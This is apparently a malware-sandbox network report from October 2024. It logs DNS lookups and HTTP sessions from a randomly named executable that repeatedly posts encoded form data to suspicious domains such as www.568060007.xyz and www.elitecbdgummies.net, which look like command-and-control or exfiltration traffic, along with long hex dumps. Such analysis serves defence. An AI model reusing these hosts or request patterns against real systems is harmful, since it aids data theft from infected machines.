                                                    Oct 10, 2024 10:01:50.528606892 CEST1.1.1.1192.168.2.60xf102No error (0)www.airgame.store188.114.96.3A (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:01:50.528606892 CEST1.1.1.1192.168.2.60xf102No error (0)www.airgame.store188.114.97.3A (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:02:04.700972080 CEST1.1.1.1192.168.2.60xa222No error (0)www.1ns6mg.vip1ns6mg.vipCNAME (Canonical name)IN (0x0001)false
                                                    Oct 10, 2024 10:02:04.700972080 CEST1.1.1.1192.168.2.60xa222No error (0)1ns6mg.vip3.33.130.190A (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:02:04.700972080 CEST1.1.1.1192.168.2.60xa222No error (0)1ns6mg.vip15.197.148.33A (IP address)IN (0x0001)false
                                                    • ia600102.us.archive.org
                                                    • paste.ee
                                                    • www.autoclean.shop
                                                    • www.568060007.xyz
                                                    • www.elitecbdgummies.net
                                                    • www.airgame.store
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.64995113.248.169.4880524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:08.011338949 CEST489OUTGET /fx9f/?mBsxM=YJ0LnZ68&-Xr8=yLkskDR0nY0t6IEYTVnouV0HkzfvHuAPmfbD5h8cln4aJalo4AVzLarmhH7o5TO/QYT7rLdNwPAjvarY55z4bEJvcGnuntwn6BS5zidhK+0y0eRY5oQOsBmzZX59GbhTRCQZQus= HTTP/1.1
                                                    Host: www.autoclean.shop
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Oct 10, 2024 10:01:08.480681896 CEST411INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 10 Oct 2024 08:01:08 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 271
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 42 73 78 4d 3d 59 4a 30 4c 6e 5a 36 38 26 2d 58 72 38 3d 79 4c 6b 73 6b 44 52 30 6e 59 30 74 36 49 45 59 54 56 6e 6f 75 56 30 48 6b 7a 66 76 48 75 41 50 6d 66 62 44 35 68 38 63 6c 6e 34 61 4a 61 6c 6f 34 41 56 7a 4c 61 72 6d 68 48 37 6f 35 54 4f 2f 51 59 54 37 72 4c 64 4e 77 50 41 6a 76 61 72 59 35 35 7a 34 62 45 4a 76 63 47 6e 75 6e 74 77 6e 36 42 53 35 7a 69 64 68 4b 2b 30 79 30 65 52 59 35 6f 51 4f 73 42 6d 7a 5a 58 35 39 47 62 68 54 52 43 51 5a 51 75 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mBsxM=YJ0LnZ68&-Xr8=yLkskDR0nY0t6IEYTVnouV0HkzfvHuAPmfbD5h8cln4aJalo4AVzLarmhH7o5TO/QYT7rLdNwPAjvarY55z4bEJvcGnuntwn6BS5zidhK+0y0eRY5oQOsBmzZX59GbhTRCQZQus="}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.64995418.163.12.680524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:23.563071966 CEST747OUTPOST /2jpw/ HTTP/1.1
                                                    Host: www.568060007.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.568060007.xyz
                                                    Referer: http://www.568060007.xyz/2jpw/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 2d 58 72 38 3d 6e 78 56 30 77 35 35 72 78 5a 69 5a 72 66 44 5a 61 35 31 66 72 39 6b 6f 52 78 7a 45 31 71 4f 2b 6b 54 44 59 32 7a 6e 35 78 53 54 78 47 4a 2f 41 6a 64 6a 77 79 53 49 48 2f 35 62 4c 71 71 4a 6b 4d 6f 59 6f 6c 38 4d 52 46 50 56 38 30 75 2b 61 35 68 65 43 33 70 78 4d 6e 47 4e 31 4a 51 33 46 4e 41 31 4c 68 67 55 66 4d 6b 62 42 51 35 35 35 44 79 49 49 51 64 4d 48 4e 70 63 66 71 70 72 73 30 2b 6c 55 79 79 39 6e 58 70 42 41 5a 6a 66 75 33 46 79 48 70 57 43 4d 77 45 39 58 39 35 6c 59 43 37 35 68 44 53 76 2f 77 62 56 61 6b 47 35 4a 6c 61 38 49 32 41 45 58 71 6d 44 53 63 6b 2f 36 6d 41 33 7a 6c 4b 45 4b 6a 59 6f 4b
                                                    Data Ascii: -Xr8=nxV0w55rxZiZrfDZa51fr9koRxzE1qO+kTDY2zn5xSTxGJ/AjdjwySIH/5bLqqJkMoYol8MRFPV80u+a5heC3pxMnGN1JQ3FNA1LhgUfMkbBQ555DyIIQdMHNpcfqprs0+lUyy9nXpBAZjfu3FyHpWCMwE9X95lYC75hDSv/wbVakG5Jla8I2AEXqmDSck/6mA3zlKEKjYoK


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.64995518.163.12.680524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:26.371321917 CEST771OUTPOST /2jpw/ HTTP/1.1
                                                    Host: www.568060007.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 233
                                                    Origin: http://www.568060007.xyz
                                                    Referer: http://www.568060007.xyz/2jpw/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 2d 58 72 38 3d 6e 78 56 30 77 35 35 72 78 5a 69 5a 74 38 4c 5a 63 75 70 66 73 64 6b 72 50 68 7a 45 37 4b 4f 36 6b 54 48 59 32 79 54 70 78 67 48 78 47 74 33 41 79 73 6a 77 78 53 49 48 72 4a 61 50 6c 4b 49 71 4d 6f 45 4b 6c 35 30 52 46 50 42 38 30 75 4f 61 36 58 57 44 6c 4a 78 30 79 57 4e 33 4b 67 33 46 4e 41 31 4c 68 67 42 79 4d 6b 6a 42 51 4a 70 35 41 58 38 4c 65 39 4d 41 61 5a 63 66 75 70 72 53 30 2b 6b 44 79 7a 67 4d 58 73 46 41 5a 69 76 75 33 55 7a 52 79 6d 43 4b 39 6b 38 70 36 72 6f 72 48 36 49 38 43 53 33 6e 74 73 51 67 6f 51 34 54 35 70 38 72 6b 51 6b 56 71 6b 62 67 63 45 2f 51 6b 41 50 7a 33 64 49 74 73 73 4e 70 48 4e 77 7a 62 56 72 35 78 30 55 50 7a 6a 67 53 57 4d 4f 4a 63 51 3d 3d
                                                    Data Ascii: -Xr8=nxV0w55rxZiZt8LZcupfsdkrPhzE7KO6kTHY2yTpxgHxGt3AysjwxSIHrJaPlKIqMoEKl50RFPB80uOa6XWDlJx0yWN3Kg3FNA1LhgByMkjBQJp5AX8Le9MAaZcfuprS0+kDyzgMXsFAZivu3UzRymCK9k8p6rorH6I8CS3ntsQgoQ4T5p8rkQkVqkbgcE/QkAPz3dItssNpHNwzbVr5x0UPzjgSWMOJcQ==
                                                    Oct 10, 2024 10:01:27.277823925 CEST1236INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Server: Microsoft-IIS/8.5
                                                    X-Powered-By: ASP.NET
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET
                                                    Access-Control-Allow-Headers: Content-Type, Authorization
                                                    Date: Thu, 10 Oct 2024 08:01:24 GMT
                                                    Connection: close
                                                    Content-Length: 1163
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>
                                                    Oct 10, 2024 10:01:27.277834892 CEST224INData Raw: f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a
                                                    Data Ascii: </h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body><
                                                    Oct 10, 2024 10:01:27.277841091 CEST8INData Raw: 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: /html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.64995618.163.12.680524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:29.112143040 CEST1784OUTPOST /2jpw/ HTTP/1.1
                                                    Host: www.568060007.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.568060007.xyz
                                                    Referer: http://www.568060007.xyz/2jpw/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 2d 58 72 38 3d 6e 78 56 30 77 35 35 72 78 5a 69 5a 74 38 4c 5a 63 75 70 66 73 64 6b 72 50 68 7a 45 37 4b 4f 36 6b 54 48 59 32 79 54 70 78 67 66 78 42 66 76 41 67 2f 37 77 77 53 49 48 6f 4a 61 4d 6c 4b 49 6e 4d 6f 63 4f 6c 35 78 71 46 4d 35 38 31 4e 47 61 37 69 32 44 75 4a 78 30 74 6d 4e 71 4a 51 33 71 4e 42 46 58 68 67 52 79 4d 6b 6a 42 51 4b 42 35 57 79 49 4c 63 39 4d 48 4e 70 63 44 71 70 72 70 30 2b 39 32 79 77 4e 33 58 34 78 41 5a 43 2f 75 31 6d 72 52 2b 6d 43 49 78 45 38 68 36 72 6b 30 48 36 55 77 43 52 72 5a 74 72 59 67 74 55 34 50 70 37 4d 49 36 7a 4e 78 33 6c 48 72 51 79 6a 52 69 68 50 35 79 76 59 70 71 2f 5a 59 4d 35 4e 70 5a 31 2b 4f 37 58 67 6b 76 6d 6c 68 64 63 4c 56 47 76 4a 4a 34 44 5a 31 78 4b 30 4b 36 64 44 62 74 6a 43 32 6d 77 52 6a 55 4b 55 77 30 33 44 56 35 65 4d 56 39 33 68 73 68 2f 34 78 76 44 38 4c 4c 66 37 79 75 70 31 6c 72 4d 48 61 73 61 58 2b 49 49 48 52 36 69 32 45 70 34 49 75 5a 32 74 6b 64 57 43 73 76 68 31 5a 44 6e 54 55 4a 45 70 76 32 74 73 2b 6c 79 46 6a 79 6d 32 46 47 [TRUNCATED]
                                                    Data Ascii: -Xr8=nxV0w55rxZiZt8LZcupfsdkrPhzE7KO6kTHY2yTpxgfxBfvAg/7wwSIHoJaMlKInMocOl5xqFM581NGa7i2DuJx0tmNqJQ3qNBFXhgRyMkjBQKB5WyILc9MHNpcDqprp0+92ywN3X4xAZC/u1mrR+mCIxE8h6rk0H6UwCRrZtrYgtU4Pp7MI6zNx3lHrQyjRihP5yvYpq/ZYM5NpZ1+O7XgkvmlhdcLVGvJJ4DZ1xK0K6dDbtjC2mwRjUKUw03DV5eMV93hsh/4xvD8LLf7yup1lrMHasaX+IIHR6i2Ep4IuZ2tkdWCsvh1ZDnTUJEpv2ts+lyFjym2FGbfRvDMyPBb8EVTSR5AAoDG7Ydr/aPJ/nQKLZ9ZkdW34TGM1Fx0EMZF0yZCPFb6NYpJsJueO77L1Gr+iSK554LU0ZuE2yU1vR/sW+/QK757gewnCk2ozQI5KV96q/gXX0vAwLNUP9ArOBsaMBbYHlFzo5YLN9LGRptcqiU+Rmg2+MDK6q2wm5XYSPH/QGtaDBzL+J5bB0fe6+TjGkP2VQZEbpiiFRzIHXps7CycyyKLRguEUDs/Yvnl9HpUNDlgoFN3MB3AUVSyHWvA+UEYUXk56LCI6bX4RWt4Pfw7R+KFBRJ9ImyN0MjWeHvJMqudxZKCswo43H0kp8LjQgN++0odwowqK3Tdi8gRwjtT/aadUfaMYReLAcIEjfzk213o1K1gD0UqnSc7VPT3SMTxoW+qx4Y71MnHsLZ4Peyq4ySwmFDVVRlFMLkeuiwzgQfbrCzlaiAk2m1OwJ1uhpn5VrmE4FqEqnDrLTfmcED1o3yG+leAr+kf43Xk2Z9Rinw3eo8TuHlWd1r1oh118oBAmlvh+a96TTRPCRZ6KQ5xJ6hY912rVlxRWCLb0GG6kzm3OeN8d95IM0aF3xy5GtLWDD0nqH4VJyNjTGqr0TUjNbsL/VzNw9yw216W1qYtJd4O7x5jB4UorZUhoK6CxZ8T0NzAL9KPIWc+Bpbs [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.64995718.163.12.680524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:31.882190943 CEST488OUTGET /2jpw/?-Xr8=qz9UzJ10+p/cjPnRdZlHv4YDQxf45KubwzSEjjTwjD/nUvv1s93evwIp+LTko4UKBcY0h9JnEtV5jsbq23POiYFTmg8OGBnfOhN/rQscVBLiXL1oe2kzRKc9D7hJiq/ZgM9Sylw=&mBsxM=YJ0LnZ68 HTTP/1.1
                                                    Host: www.568060007.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.649958172.96.186.20480524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:37.204538107 CEST765OUTPOST /iaoq/ HTTP/1.1
                                                    Host: www.elitecbdgummies.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.elitecbdgummies.net
                                                    Referer: http://www.elitecbdgummies.net/iaoq/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 2d 58 72 38 3d 71 4a 65 58 37 49 37 49 6f 39 38 59 6c 71 51 4f 51 48 61 54 33 39 34 6d 6d 6a 4a 6a 4f 6c 35 52 66 59 58 63 37 50 77 76 71 6d 77 36 46 64 70 67 72 46 53 71 50 45 4f 43 6c 64 44 33 35 66 4b 55 7a 58 49 41 47 33 4b 36 33 74 33 42 5a 4f 50 63 68 61 6a 41 68 31 49 69 37 74 42 44 33 2b 67 59 6f 5a 50 31 63 39 39 49 51 6a 74 35 6f 66 51 79 53 41 5a 59 77 49 53 79 4f 73 2f 69 37 69 4c 6e 54 2f 6c 54 74 64 4e 5a 54 36 43 66 31 49 64 44 56 4b 73 57 4c 72 71 46 46 4a 74 7a 55 31 47 52 75 49 73 76 61 68 48 67 7a 2f 56 4d 38 63 37 61 44 31 65 6f 71 71 4f 50 66 51 2f 62 50 7a 4a 46 79 72 4b 5a 64 6e 53 67 50 39 42 4e
                                                    Data Ascii: -Xr8=qJeX7I7Io98YlqQOQHaT394mmjJjOl5RfYXc7Pwvqmw6FdpgrFSqPEOCldD35fKUzXIAG3K63t3BZOPchajAh1Ii7tBD3+gYoZP1c99IQjt5ofQySAZYwISyOs/i7iLnT/lTtdNZT6Cf1IdDVKsWLrqFFJtzU1GRuIsvahHgz/VM8c7aD1eoqqOPfQ/bPzJFyrKZdnSgP9BN
                                                    Oct 10, 2024 10:01:38.034039974 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/7.4.33
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"
                                                    x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRP
                                                    x-litespeed-cache-control: no-cache
                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                    transfer-encoding: chunked
                                                    content-encoding: br
                                                    vary: Accept-Encoding
                                                    date: Thu, 10 Oct 2024 08:01:37 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b [TRUNCATED]
                                                    Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2%pox=ZveX.UP}KARoZ-{U*nj{&w$sr{SJ/!2%KjBb}-pC>rs>cdsG~~NmE;HmFDjUWa"/F2D1u{ ",^WOp-Y<iLW85qIvCQW.[@nf\STT<u!?$$CI>t@Ad_k"OgQ+r.-C4h7A<&kn76aDtFkqE|^=eWd?r?U,^X%\5.f_Au}o g,D}wT9IZ@n
                                                    Oct 10, 2024 10:01:38.034065962 CEST224INData Raw: cc b1 a4 fd bf 61 de 02 34 39 a1 e3 a4 79 eb fb 1e 1c 46 82 88 2a 70 94 45 51 0b 70 a9 21 37 8b fc 24 c9 e5 b6 4a 4e f2 c5 40 fa 1f e3 7f 87 01 7a ff 68 6e 01 d1 b8 2e 26 32 99 48 ad 22 dc 05 4b 4a ae cc 5b e5 55 1e c5 41 f8 d0 55 df f9 09 55 b9
                                                    Data Ascii: a49yF*pEQp!7$JN@zhn.&2H"KJ[UAUUogU~yT9dw'qq;c@hdXeSN?g,7N<{R\"?Y,XHLL>k$_,M{#[8
                                                    Oct 10, 2024 10:01:38.034080029 CEST1236INData Raw: 14 d8 84 e1 e8 9e 47 39 b5 be b8 c6 57 88 18 4b e0 65 5d a6 2c 51 ae 65 a2 b3 be 5f 85 5f 5b ca e6 6d 84 18 8d 77 b7 e8 83 ea 40 44 c0 cf 08 3d f5 fc cb ed af bf 88 88 c1 b8 ce b4 47 8a 8c cd 45 47 7e 9a 67 12 ce 75 a0 c0 91 3b 36 81 68 43 fb 5e
                                                    Data Ascii: G9WKe],Qe__[mw@D=GEG~gu;6hC^iB+WQ6ti^15~'^m$H;8$wuHAt{;)(TIz{Npha8Kw)$ 03&mo`P(I#egQ3]MUcE[hqsx]r.
                                                    Oct 10, 2024 10:01:38.034104109 CEST1236INData Raw: 74 38 70 af 8d ac e3 f5 e5 a5 9b 1c db 73 b0 ac ce c7 fc 10 f9 ea fb f5 ee 05 55 b5 6f cb 01 85 39 30 d8 09 52 47 f6 9f da 38 6a 07 12 64 29 2b 2f c2 d7 ea b7 03 42 96 70 24 3f 67 26 a7 8c fe 74 c9 34 20 63 c4 bc 3e 16 59 4c 7e 24 dd 37 d1 4e 6b
                                                    Data Ascii: t8psUo90RG8jd)+/Bp$?g&t4 c>YL~$7Nk-&Bst9_0G"pTva8#!qLm_h9.T*">5MtN2uo{xO@t~UQJz$6aCy`S{yFFJ'
                                                    Oct 10, 2024 10:01:38.034118891 CEST1236INData Raw: 10 0a 13 0f 24 f8 97 51 d8 bd 19 4a 08 77 3c d2 68 18 19 3c 5a 73 44 f1 88 b7 a0 35 4d 19 6d f2 1a b1 0a d8 f2 f0 31 f1 a0 da f8 b8 77 07 b0 ed a4 07 a1 b5 31 0e 1d 06 91 19 18 8d df 6a a1 0b 83 46 92 0a 52 1b 57 22 62 82 80 d1 e4 43 29 68 51 c8
                                                    Data Ascii: $QJw<h<ZsD5Mm1w1jFRW"bC)hQhGd7"25eP_V$HPG$<Dt5-$z"fI.ts5)SQJn1-|.aMh>f"W3R($$qN5qjLQjNrj1xQz~
                                                    Oct 10, 2024 10:01:38.034154892 CEST1236INData Raw: 87 b0 d3 3c eb 8b fe ba 80 82 f9 74 6f 23 c6 32 81 d2 8f e4 49 ad f7 a4 96 42 7e 97 15 ce 1c f3 66 1b 02 76 31 16 d2 21 08 a6 91 34 6b 0a 61 9d db 44 c5 f6 d3 03 52 46 87 c6 29 67 6e f9 50 c0 41 d8 72 09 e4 bd 01 39 9d 22 c2 83 e3 fd ce c5 47 9c
                                                    Data Ascii: <to#2IB~fv1!4kaDRF)gnPAr9"Gxnv5=[P%mj1&fzhzNq7p2c-d:5GBX=,(/,Bg^DQ|rbf+|Y,h&A8EF#0"FzhL^pL38
                                                    Oct 10, 2024 10:01:38.034169912 CEST896INData Raw: cd 36 3c b7 70 20 11 68 7e 82 2f 16 52 a4 45 dd d0 aa b7 6d b5 13 aa ce 94 08 9a 70 6f 64 48 89 56 d0 73 ca c1 49 fb 11 02 2a 64 91 16 09 0e 05 4d 03 c1 2b 26 33 1a ff 80 8f 3d d0 53 47 3e 48 ba 4c c7 9e e7 f4 04 55 67 db 6c c3 b3 f6 a6 d9 64 21
                                                    Data Ascii: 6<p h~/REmpodHVsI*dM+&3=SG>HLUgld!{loJ(BNZj9pt[MumxL%+eZ250`%f^8dnQy~"*b"+\,{4Vg/&/V:16<M:md
                                                    Oct 10, 2024 10:01:38.034184933 CEST1236INData Raw: 2d 25 63 04 1f 6a 1d 76 14 ef c6 60 06 b5 0e 0d de 8d c4 01 04 27 5c d8 33 3f 80 d6 33 dc 90 b5 40 43 82 77 26 29 f1 8f 34 cf e8 b1 cb 60 9d 0a c2 8f 18 42 34 db ba 0c 1e cd 9a 0b f9 0a 5f 2b e5 b2 d9 86 eb db b7 cd 36 5c a9 f6 23 0a c8 b2 85 ae
                                                    Data Ascii: -%cjv`'\3?3@Cw&)4`B4_+6\#oO=xGlz|A`^*MVs?1JW|LpV%BcEXjqtr-gfhBbq$Jj6\C*{$5%T#u=\S|e7wMuX`5
                                                    Oct 10, 2024 10:01:38.034200907 CEST1236INData Raw: 7b 45 74 1f 34 a7 91 a1 c7 2d a8 37 2e 79 25 05 f4 da e3 ed c9 e2 a3 1d b4 31 08 c4 74 e6 9a f1 0b 6e e8 cf d1 88 cd 5d 07 53 b0 27 5c 19 9b 89 77 bd c9 d4 b9 a1 10 82 a9 f7 19 dd ab 10 90 23 51 3a d9 90 9c cf 18 db ee f5 79 e6 81 a3 03 99 d3 48
                                                    Data Ascii: {Et4-7.y%1tn]S'\w#Q:yHo:vOk0C#Zp>OmkM@T-Pgj[R|wE`h\3LJi KjpVjFDrqou7WIy`#9lpCF!P[SqQRiOt
                                                    Oct 10, 2024 10:01:38.034218073 CEST1236INData Raw: 3c 30 35 9a 13 dc c5 68 ff 07 a9 d1 9c 08 49 b0 62 1f 89 06 c3 71 0f 13 a1 49 b0 18 ef 14 df 61 c3 58 22 46 e3 cd 03 3f da 59 7c 6d 86 a6 69 08 20 08 af 9a 28 51 cf 44 2b c2 f3 e4 6f 57 06 df a4 af 0c c0 24 ae 34 2f 1a 0d dc 8c 62 3b 09 be 68 eb
